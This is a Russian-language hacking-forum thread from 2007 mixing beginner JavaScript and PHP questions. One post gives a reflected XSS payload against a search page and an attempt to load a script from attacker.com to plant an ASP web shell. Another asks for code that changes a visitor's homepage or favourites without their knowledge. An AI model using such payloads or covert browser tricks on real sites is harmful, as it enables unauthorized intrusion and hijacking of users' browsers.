HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 16.06.2007, 12:43
Tw!m4
Познающий
Регистрация: 15.06.2007
Сообщений: 91
С нами: 9951302

Репутация: 38
По умолчанию

Привет народ!

Собссно такое дело.....есть сайт на котором иксэсэс такова рода:
_http://site.com/search.asp?query="><script>alert()</script>

хз какова типа (пассивный или активный), можна ли залить на него асп-эшный шелл таким путём? если да, то расскажите по подробней плз, а то в иксэсэсах я не очень шарю. Я уже пробовал таким путём прописать его:
_http://site.com/search.asp?query="><script src=http://attacker.com/script.js></script>
Где скрипт.жс указывает прописать шелл на (в) страницу с функцией document.write() , но в итоге я получаю контент этого шелла на странице.

Подскажте плз...

//ЗЫ: Со снифером дело отпадает....

Последний раз редактировалось Tw!m4; 16.06.2007 в 12:50..
 
Ответить с цитированием

  #12  
Старый 16.06.2007, 14:51
Tw!m4
Познающий
Регистрация: 15.06.2007
Сообщений: 91
С нами: 9951302

Репутация: 38
По умолчанию

Хех......)) чета я об этом даже и не подумал (о выполнение кода в браузере а не на серваке).....хм.....аякс я к сожелению не знаю.....эта значит я в пролёте? да уж....фигня какая то ((......а че можна в таком случае еще сделать?
 
Ответить с цитированием

  #13  
Старый 17.06.2007, 09:00
Макс 8===3
Новичок
Регистрация: 03.11.2006
Сообщений: 28
С нами: 10272741

Репутация: 3
По умолчанию

Всем привет, подскажите плиз скрипт редиректа без задержки. Есть такой :

<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://">

Но он всёрабно перед загрузкой нужной страницы заходит на главную....

Спасибо!
 
Ответить с цитированием

  #14  
Старый 17.06.2007, 09:14
hhover
Познающий
Регистрация: 21.05.2007
Сообщений: 61
С нами: 9986942

Репутация: 145
По умолчанию

Только при помощи php или htaccess.
PHP код:
<?php
header 
"Location: http://site.com" );
?>
 
Ответить с цитированием

  #15  
Старый 17.06.2007, 16:30
Макс 8===3
Новичок
Регистрация: 03.11.2006
Сообщений: 28
С нами: 10272741

Репутация: 3
По умолчанию

Понял, спасибо! впринципе уже добился чего хотел, а ещё такой вопрос. Подскажите скрипт который добавляет нужную страницу на стартовую страницу, и\или в избранное без ведома юзера!!!!
 
Ответить с цитированием

  #16  
Старый 19.06.2007, 18:27
Raz0r
Участник форума
Регистрация: 07.01.2007
Сообщений: 259
С нами: 10179446

Репутация: 41
По умолчанию

Макс 8===3, кстати, редирект можно и с помощью JS замутить, и будет, вроде как без задержки.
PHP код:
<script language="JavaScript">
 
document.location.href "http://someshit/";
</
script
Правда в случае отключенного JS, ясен, не покатит, так-что PHP вариант рулит но раз уж тут тема про JS решил запостить.
 
Ответить с цитированием

  #17  
Старый 21.06.2007, 23:26
RaiDeRz
Участник форума
Регистрация: 05.04.2007
Сообщений: 123
С нами: 10052518

Репутация: 27
По умолчанию

Каким образом можно сделать подтверждение нажатия на ссылку? Дайте пример
 
Ответить с цитированием

  #18  
Старый 21.06.2007, 23:34
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами: 11058146

Репутация: 4536


По умолчанию

Код:
<script type='text/javascript'>
function check(url){
if(confirm("да?")){
document.location=url;
}else{
alert('нет так нет');
}
}
</script>
<a href='javascript://' onClick="check('next.page)">123</a>
 
Ответить с цитированием

  #19  
Старый 22.06.2007, 00:05
RaiDeRz
Участник форума
Регистрация: 05.04.2007
Сообщений: 123
С нами: 10052518

Репутация: 27
По умолчанию

Цитата:
Сообщение от GreenBear  
Код:
<script type='text/javascript'>
function check(url){
if(confirm("да?")){
document.location=url;
}else{
alert('нет так нет');
}
}
</script>
<a href='javascript://' onClick="check('next.page)">123</a>
че-то непашет)) наверно из-за неправильного кода в a href
 
Ответить с цитированием

  #20  
Старый 22.06.2007, 00:09
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами: 11058146

Репутация: 4536


По умолчанию

ну ковычку сами догадаетесь поставить.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Delphi]/[Pascal] Задай вопрос, получи ответ Isis С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby 6762 17.06.2010 21:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.